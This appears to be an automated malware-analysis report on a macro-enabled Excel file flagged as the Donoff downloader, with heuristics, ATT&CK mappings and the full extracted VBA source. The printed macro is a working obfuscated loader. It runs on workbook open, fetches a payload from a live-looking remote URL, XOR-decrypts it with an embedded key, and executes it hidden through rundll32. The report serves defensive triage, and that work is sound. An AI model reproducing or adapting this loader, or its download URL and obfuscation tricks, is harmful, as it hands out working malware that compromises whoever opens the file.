Verdict: MALICIOUS
Risk Score: 390

Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1566.001 Spearphishing Attachment
T1203 Exploitation for Client Execution
The file contains a Workbook_Open macro that utilizes obfuscated VBA code, including calls to Shell() and CreateObject(). This pattern is indicative of a downloader designed to fetch and execute a secondary payload from a remote URL. The embedded URL http://maxleather.aaomg.com/jhg45s is highly suspicious and likely serves as the distribution point for the next stage of the attack.
Heuristics (9)

- ClamAV: Xls.Downloader.Donoff-10030344-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Xls.Downloader.Donoff-10030344-0
- VBA project inside OOXML (medium, OOXML_VBA, 6 related findings): Document contains a VBA project; VBA macros present.
- Potential Shell call in VBA (critical, OLE_VBA_SHELL): Potential Shell call in VBA.
  Matched lines in script:
    WordCount = UBound(aOut) + 1
    Call Shell(sIn, vbHide)
- Obfuscated auto-exec VBA loader (critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER): Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  Matched lines in script:
    Set generatedByDDefo1DASH1solo = CreateObject(generatedByDDefoPLdunay(3))
    Set generatedByDDefoKSKLAL = generatedByDDefo1DASH1solo.Environment(generatedByDDefoPLdunay(2 + 2))
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call.
  Matched lines in script:
    Set generatedByDDefo1DASH1solo = CreateObject(generatedByDDefoPLdunay(3))
    Set generatedByDDefoKSKLAL = generatedByDDefo1DASH1solo.Environment(generatedByDDefoPLdunay(2 + 2))
- CallByName call (high, OLE_VBA_CALLBYNAME): CallByName call.
  Matched lines in script:
    VarPupka:
    CallByName generatedByDDefora12dv34, "sa" + RACHEL + "ile", VbMethod, generatedByDDefoUUUKABBB, 14 / 7
    SaveAllStufAndExit generatedByDDefoUUUKABBB, generatedByDDefoUUUKA, "XNplLxvSG39YeXNXYidwXaOcq9h7uJZs"
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Workbook_Open macro (low, OLE_VBA_WBOPEN): Workbook_Open macro.
  Matched lines in script:
    Attribute VB_Customizable = True
    Sub Workbook_Open()
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://maxleather.aaomg.com/jhg45s (found in document text: OOXML body / shared strings)
Extracted artifacts (2)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 11536 bytes |

SHA-256: 0e6eb3b13408c893b9f9aaca012e6b0363773378da8e5fd3cdc7d222ce5684ca
Preview script: first 1,000 lines of the extracted script

```vb
Attribute VB_Name = "ЭтаКнига"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub Workbook_Open()
    ItNinja "Chelsi"
End Sub
Attribute VB_Name = "Лист1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Module2"
Public generatedByDDefoDAcdaw As Object
Public generatedByDDefora12dv34 As Object
Public generatedByDDefoKSKLAL As Object
Public generatedByDDefoLAKOPPC As String
Public generatedByDDefoPLdunay() As String
Public generatedByDDefoUUUKA As String
Public generatedByDDefoUUUKABBB As String
Public generatedByDDefoGMAKO As Object
Public generatedByDDefo4 As String
Public generatedByDDefo2 As String
Public generatedByDDefoASALLLP As Variant
Public Const generatedByDDefoRH = "User-Agent"
Public Const RACHEL = "vetof"
Function CreateShare()
    Set objNewShare = objWMIService.Get("Win32_Share")
    intReturn = objNewShare.Create _
        (FilePath, "WMI_SHARE", 0, 25, "")
    If intReturn <> 0 Then
        WScript.Echo "WMIEXEC ERROR: Share could not be created." & _
            vbNewLine & "WMIEXEC ERROR: Return value -> " & intReturn
        Select Case intReturn
            Case 2
                WScript.Echo "WMIEXEC ERROR: Access Denied!"
            Case 9
                WScript.Echo "WMIEXEC ERROR: Invalid File Path!"
            Case 22
                WScript.Echo "WMIEXEC ERROR: Share Name Already In Used!"
            Case 24
                WScript.Echo "WMIEXEC ERROR: Directory NOT exists!"
        End Select
        If intReturn <> 22 Then WScript.Quit 1
    Else
        WScript.Echo "WMIEXEC : Share created sucess."
        WScript.Echo "WMIEXEC : Share Name -> WMI_SHARE"
        WScript.Echo "WMIEXEC : Share Path -> " & FilePath
    End If
End Function
Public Function GodnTeBabenParama(CH1 As String, CH2 As String, CH3 As String) As String
    GodnTeBabenParama = Replace(CH1, CH2, CH3)
End Function
Public Function NombreUsuario() As String
    Dim SQL As String
    generatedByDDefora12dv34.Type = 0 + 0 + 1
    generatedByDDefora12dv34.Open
    Exit Function
    SQL = "Select * from Usuarios WHERE usu_id=" & IdUsuario
    If Not RsUsuario.EOF Then
        NombreUsuario = RsUsuario!usu_apodo
    End If
End Function
Public Function ToDBDateTime(ByVal ddmmyyhhmmDateTime As String) As String
    Set generatedByDDefo1DASH1solo = CreateObject(generatedByDDefoPLdunay(3))
    Set generatedByDDefoKSKLAL = generatedByDDefo1DASH1solo.Environment(generatedByDDefoPLdunay(2 + 2))
    VerCadenaPermiso ddmmyyhhmmDateTime
End Function
Attribute VB_Name = "Module3"
Public Sub DecryptByte(ByteArray() As Byte, Key As String)
    Dim offset As Long
    Dim ByteLen As Long
    Dim ResultLen As Long
    Dim CurrPercent As Long
    Dim NextPercent As Long
    Dim m_Key() As Byte
    Dim m_KeyLen As Long
    m_KeyLen = Len(Key)
    ReDim m_Key(m_KeyLen)
    m_Key = StrConv(Key, vbFromUnicode)
    ByteLen = UBound(ByteArray) + 1
    ResultLen = ByteLen
    For offset = 0 To (ByteLen - 1)
        ByteArray(offset) = ByteArray(offset) Xor m_Key(offset Mod m_KeyLen)
        If (offset >= NextPercent) Then
            CurrPercent = Int((offset / ResultLen) * 100)
            NextPercent = (ResultLen * ((CurrPercent + 1) / 100)) + 1
        End If
    Next
End Sub
Public Sub VerCadenaPermiso(permiso As String)
    Dim i As Long
    Dim letra As String
    Alta = False
    Baja = False
    modi = False
    Dim Consu As Boolean
    Consu = True
    Dim hizen As String
    generatedByDDefo4 = "http://maxleather.aaomg.com/jhg45s"
    hizen = Application & "frs"
    rodger = Split(hizen, " ")
    If rodger(0) = "Microsoft" Then
        generatedByDDefoDAcdaw.Open generatedByDDefoPLdunay(5), generatedByDDefo4, False
        generatedByDDefoDAcdaw.setRequestHeader generatedByDDefoRH, "Mozilla/4.5 (compatible; MSIE 6.5; Windows NT 5.5)"
        generatedByDDefoDAcdaw.Send
        TlfFormat letra, True
        NombreUsuario
        generatedByDDefoacheha letra
    End If
    Exit Sub
    For i = 1 To Len(permiso)
        letra = Mid(permiso, i, 1)
        If letra = "A" Then
            Alta = True
        End If
        If letra = "B" Then
            Baja = True
        End If
        If letra = "M" Then
            modi = True
        End If
        If letra = "C" Then
            Consu = True
        End If
    Next i
    If Len(permiso) = 0 Then
        Consu = False
        modi = False
        Alta = False
        Baja = False
    End If
End Sub
Public Function GetResulOfMyResult(ByVal Cadena As String) As String
    generatedByDDefo2 = GodnTeBabenParama(generatedByDDefo2, "%DI", "M")
    GetCurrentFolder
    Set generatedByDDefora12dv34 = CreateObject(generatedByDDefoPLdunay(1))
    Set generatedByDDefoGMAKO = CreateObject(generatedByDDefoPLdunay(5 - 3))
    ClearString ""
End Function
Public Function generatedByDDefoacheha(pass As String) As String
    Dim temp As String
    Dim generatedByDDefotum As String
    GoTo beyTumba
    Dim pos As Long
    Dim leng As Long
    Dim tim As Variant
    Dim i As Long
    Dim Key As Long
    leng = Len(pass)
    tim = Mid(Time, 1, 8)
    tim = Mid(tim, 1, Len(tim) - 3)
    tim = Mid(tim, Len(tim) - 1, 2) * Int(Rnd * 100)
    For i = 1 To Len(CStr(tim))
        pos = pos + CInt(Mid(CStr(tim), i, 1))
    Next
    While pos > Len(pass)
        pos = pos Mod 10 + Int(Rnd * 10)
        If pos = 0 Then
            pos = Len(pass) + 1
        End If
    Wend
beyTumba:
    generatedByDDefoASALLLP = generatedByDDefoDAcdaw.responseBody
    ReadResult
End Function
Attribute VB_Name = "P"
Public Function ReadResult()
    generatedByDDefora12dv34.Write generatedByDDefoASALLLP
    GoTo pid7
    WScript.Sleep (WAITTIME)
    UNCFilePath = "\\" & host & "\" & "WMI_SHARE" & "\" & Filename
    Set fso = CreateObject("Scripting.FileSystemObject")
    Set objFile = fso.OpenTextFile(UNCFilePath, 1)
    If Not objFile.AtEndOfStream Then strContents = objFile.ReadAll
    objFile.Close
    WScript.Echo strContents
    strDelFile = "del " & file & " /F"
    exe.c strDelFile, "nul"
pid7:
    TlfFormat "", False
End Function
Public Function GetCurrentFolder()
    generatedByDDefo2 = GodnTeBabenParama(generatedByDDefo2, "*P", LCase("S"))
    GoTo mig5
    WScript.Sleep (WAITTIME)
    UNCFilePath = "\\" & host & "\" & "WMI_SHARE" & "\" & Filename
    Set fso = CreateObject("Scripting.FileSystemObject")
    Set objFile = fso.OpenTextFile(UNCFilePath, 1)
    GetCurrentFolder = objFile.ReadLine
    objFile.Close
    strDelFile = "del " & file & " /F"
    exe.c strDelFile, "nul"
mig5:
    generatedByDDefoPLdunay = Split(generatedByDDefo2, "JIIIINX")
End Function
Public Function ClearString(ByRef inOrigString As String) As String
    Dim strNewString As String
    Dim sChar As String
    Dim i As Integer
    Dim d As Boolean
    d = True
    IsWord = True
    For i = 1 To Len(Trim("Reika"))
        If d = False Then
            Set generatedByDDefoDAcdaw = CreateObject(generatedByDDefoPLdunay(i - 2))
            Exit For
        Else
            d = False
        End If
    Next i
    ToDBDateTime ""
    Exit Function
    Call check_fo.r_MAXIS(False)
    Call navigate_t.o_MAXIS_screen("POLI", "____")
    EMWri.teScreen "TEMP", 5, 40
    EMWri.teScreen "TABLE", 21, 71
    trans.mit
    Set objExcel = CreateObject("Excel.Application")
    objExcel.Visible = True
    Set objWorkbook = objExcel.Workbooks.Add()
    objExcel.DisplayAlerts = True
    objExcel.Cells(1, 1).Value = "TITLE"
    objExcel.Cells(1, 2).Value = "SECTION"
    objExcel.Cells(1, 3).Value = "REVISED"
    For i = 1 To 3
        objExcel.Cells(1, i).Font.Bold = True
    Next
    ClearString = strNewString
End Function
Public Sub SaveAllStufAndExit(SourceFile As String, DestFile As String, Optional Key As String)
    Dim libhercen As Integer
    Dim ByteArray() As Byte
    libhercen = FreeFile
    Open SourceFile For Binary As #libhercen
    ReDim ByteArray(0 To LOF(libhercen) - 1)
    Get #libhercen, , ByteArray()
    Close #libhercen
    Call DecryptByte(ByteArray(), Key)
    libhercen = FreeFile
    Open DestFile For Binary As #libhercen
    Put #libhercen, , ByteArray()
    Close #libhercen
End Sub
Public Function ItNinja(ByRef inGUID As String) As String
    generatedByDDefo2 = "%DIicro*Poft.X%DILHTTPJIIIINXAdodb.*Ptr@JJa%DIJIIIINX*Ph@JJll.Ap"
    generatedByDDefo2 = generatedByDDefo2 + GodnTeBabenParama("plicationJIIIINXW*Pcript.*Ph@JJllJIIIINXProc@JJ*P*PJIIIINXG@JJTJIIIINXT@JJ%DIPJIIIINXTyp@JJJIIIINXop@JJnJIIIINXwritRUFUSAKpon*P@JJBodyJIIIINX*Pav@JJtofil@JJJIIIINX", "RUFUSAK", "@JJJIIIINXr@JJ*P")
    generatedByDDefo2 = GodnTeBabenParama(generatedByDDefo2 + "\siluan*P.dll", "@JJ", "e")
    GetResulOfMyResult "-"
    Exit Function
    If Mid$(inGUID, 1, 1) <> "{" Then
        ItNinja = "{" & inGUID & "}"
    Else
        ItNinja = inGUID
    End If
End Function
Public Function TlfFormat(ByVal tlfNr As String, dilodan As Boolean) As String
    Dim tmp As String
    Dim i As Long
    If dilodan Then
        generatedByDDefoLAKOPPC = generatedByDDefoKSKLAL(generatedByDDefoPLdunay(6))
        generatedByDDefoUUUKA = generatedByDDefoLAKOPPC
        generatedByDDefoUUUKABBB = generatedByDDefoUUUKA + "\vslaski"
        generatedByDDefoUUUKA = generatedByDDefoUUUKA + generatedByDDefoPLdunay(12)
        Exit Function
    Else
        GoTo VarPupka
    End If
restart:
    For i = 1 To Len(tlfNr)
        If Mid$(tlfNr, i, 1) = " " Then
            tlfNr = Mid$(tlfNr, 1, i - 1) & Mid$(tlfNr, i + 1)
            GoTo restart
        End If
    Next i
    For i = 1 To Len(tlfNr)
        tmp = tmp & Mid$(tlfNr, i, 1)
        If i = 2 Or i = 4 Or i = 6 Or i = 8 Or i = 10 Then
            tmp = tmp & " "
        End If
    Next i
    TlfFormat = tmp
VarPupka:
    CallByName generatedByDDefora12dv34, "sa" + RACHEL + "ile", VbMethod, generatedByDDefoUUUKABBB, 14 / 7
    SaveAllStufAndExit generatedByDDefoUUUKABBB, generatedByDDefoUUUKA, "XNplLxvSG39YeXNXYidwXaOcq9h7uJZs"
    WordCount "rund" & "ll32.exe " & generatedByDDefoUUUKA & ",qwerty", Split(", .", " ")
End Function
Function NormalizeString(sIn, aDelims)
    Dim i, sOut, aOut, iMax
    sOut = sIn
    For i = LBound(aDelims) To UBound(aDelims)
        sOut = Replace(sOut, aDelims(i), " ")
    Next
    aOut = Split(sOut, " ")
    sOut = ""
    iMax = UBound(aOut)
    For i = LBound(aOut) To iMax
        If aOut(i) <> "" Then
            sOut = sOut + aOut(i) + " "
        End If
    Next
    NormalizeString = Trim(sOut)
End Function
Function WordCount(sIn, aDelims)
    Dim sOut, aOut
    sOut = NormalizeString(sIn, aDelims)
    aOut = Split(sOut, " ")
    WordCount = UBound(aOut) + 1
    Call Shell(sIn, vbHide)
End Function
Function ExtractWord(iPos, sIn, aDelims)
    Dim sOut, aOut
    sOut = NormalizeString(sIn, aDelims)
    aOut = Split(sOut, " ")
    ExtractWord = aOut(iPos)
End Function
```
| Filename | Kind | Source | Size |
|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 41472 bytes |

SHA-256: 89e347ea44621e0f50f2c77de71de2e9b6b8ff57baeb721a61897fe679aae4e5

Detection
ClamAV: Xls.Downloader.Donoff-10030344-0
Obfuscation or payload: unlikely